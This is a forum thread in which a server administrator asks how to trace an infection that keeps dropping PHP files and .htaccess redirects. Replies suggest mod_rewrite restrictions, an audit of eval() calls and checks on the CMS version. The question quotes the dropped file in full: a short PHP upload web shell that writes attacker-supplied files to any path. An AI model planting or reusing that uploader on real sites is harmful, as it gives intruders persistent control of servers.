Answer the question
In order to leave comments, you need to log in
How to find a vulnerability on the server/websites?
In general, some kind of infection climbed onto the server.
Creates periodically(?) various files like class.php / main.php / and other interesting names. Previously, redirects were also registered in .htaccess, but I corrected this by changing the rights (such is the patch). It also creates a file with the following content:
<?
if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); Exit;}
if ($_FILES['F1l3']) {
move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']);
echo 'OK';
} else {
echo 'You are forbidden!';
}
?>
Answer the question
In order to leave comments, you need to log in
There was such a problem. Through a hole in the old CMS, scripts were placed for mailing with Soap. Knowing that there are only two entry points in CMS, I wrote a rule via mod_rewrite
If the request method is POST and the file being accessed is not one of these two, then show it a cookie.
It's on the periphery. And also, I put bans on access to all administrative folders, the content of which is included. And in the end I found all the scripts that use eval (). And I checked all of them for code injection. Helped. Although the bots are still knocking.
what CMS?
CMS version?
what modules are installed?
Disable SuEXEC while you figure it out
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question